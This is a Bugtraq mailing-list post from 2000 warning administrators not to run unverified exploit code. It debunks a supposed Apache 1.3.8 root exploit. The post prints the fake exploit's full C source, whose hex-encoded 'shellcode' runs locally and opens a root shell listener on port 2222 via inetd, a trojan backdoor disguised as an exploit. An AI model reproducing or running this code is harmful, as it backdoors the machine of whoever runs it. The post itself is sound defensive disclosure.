Bugtraq mailing list archives
don't run random "exploit" code
From: marcs () ZNEP COM (Marc Slemko)
Date: Tue, 8 Feb 2000 14:55:48 -0700
-----BEGIN PGP SIGNED MESSAGE----- Below is some code that I have seen a number of times, with some very slight variations, over the past few months. I have no idea how many people have been tricked by it. This does not exploit any hole in Apache, period. As a simple inspection shows you, it will run: echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h on the local machine. If you try this "exploit" as root, it will certainly try to compromise your machine. But not remotely and it is nothing to do with Apache or any bug other than the "bug" of admins running random code as root. I know this should be too obvious to have to say and should be no news to anyone here, but: do not run random supposed exploits as root on your box without knowing what they do. Do not even run them as a non-root UID unless it is a throwaway UID (better yet, a throw away box) and you have examined what the program does. This obviously applies to things posted to bugtraq but, even more so, to "secret" exploits you may find or be sent. Again: the below code has nothing to do with any supposed security hole in Apache. To top it all off, in this case is the fact is that there was never an Apache 1.3.8 released to exploit. Apache went from 1.3.6 to 1.3.9. I am posting this to chop off any rumors of a "secret" Apache root exploit at the knees as well as to give people an example of why they shouldn't do silly things. Thanks. /* remote apache 1.3.8 root exploit (linux) */ #include <stdio.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char shellcode[] = \ "\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72" "\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74" "\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20" "\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f" "\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e" "\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68"; #define NOP 0x90 #define BSIZE 256 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>\n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memory\n"); exit(1); } memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '\0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such server\n"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socket\n"); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refused\n"); exit(1); } printf("sending exploit code...\n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!\n"); else printf("sorry, this site isn't vulnerable\n"); printf("waiting for shell.....\n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", shellcode, 0); else wait(NULL); while (1) { /* shell */ } } - -- Marc Slemko | Apache Software Foundation member marcs () znep com | marc () apache org -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOKCQ51Qv/g4Arev1AQEsqwP/Rs5+WrJtuTavrvpPh2Fwfc5twpYVDTrh mlLUYzfReB8T0gUDgjr5/SEO/KDcn/i+qwQ8V7y5XWqRLUx4j+QVZNW+HIzQnoH3 6cbqIUT1vH49fMQIO/5tsuYvFlRX+sN/HIILTtVlc32Ok9TOBapiRTfSl29tROjS SolcNQONdyk= =6HcL -----END PGP SIGNATURE-----
Current thread:
- Re: Statistical Attack Against Virtual Banks, (continued)
- Re: Statistical Attack Against Virtual Banks Andre L. Dos Santos (Feb 08)
- SCO OpenServer SNMPD vulnerability NAI Labs (Feb 07)
- Re: Tempfile vulnerabilities Werner Koch (Feb 02)
- Re: Tempfile vulnerabilities Chris Cappuccio (Feb 03)
- Cross Site Scripting security issue Robert Zilbauer (Feb 02)
- Re: Tempfile vulnerabilities Len Budney (Feb 03)
- Re: Tempfile vulnerabilities antirez (Feb 05)
- Re: Tempfile vulnerabilities Ian Turner (Feb 07)
- Re: Tempfile vulnerabilities Seth David Schoen (Feb 07)
- Remote access vulnerability in all MySQL server versions Robert van der Meulen (Feb 08)
- don't run random "exploit" code Marc Slemko (Feb 08)
- cookies - nothing new Steven Champeon (Feb 07)
- Re: cookies - nothing new MJE (Feb 08)
- Re: Tempfile vulnerabilities Peter Berendi (Feb 08)
- Re: Tempfile vulnerabilities Marc Lehmann (Feb 08)